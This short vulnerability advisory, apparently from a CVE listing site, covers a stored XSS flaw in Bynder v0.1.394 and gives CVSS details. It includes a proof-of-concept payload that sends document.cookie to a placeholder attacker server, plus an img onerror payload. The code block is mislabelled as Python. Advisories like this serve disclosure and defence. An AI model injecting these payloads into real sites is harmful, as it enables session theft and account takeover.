A stored cross-site scripting (XSS) vulnerability in Bynder v0.1.394 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
CVSS Details
CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
Bynder v0.1.394
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for Stored XSS in Bynder v0.1.394 -->
<!-- Inject this payload into a vulnerable input field (e.g., Username, Description) -->
<script>
// Simple verification payload
alert('CVE-2026-31153 XSS Triggered');
// Data exfiltration example
var img = new Image();
img.src = "http://attacker-controlled-server/log.php?c=" + encodeURIComponent(document.cookie);
</script>
<!-- Alternative Image Tag Payload -->
<img src=x onerror=alert(1)>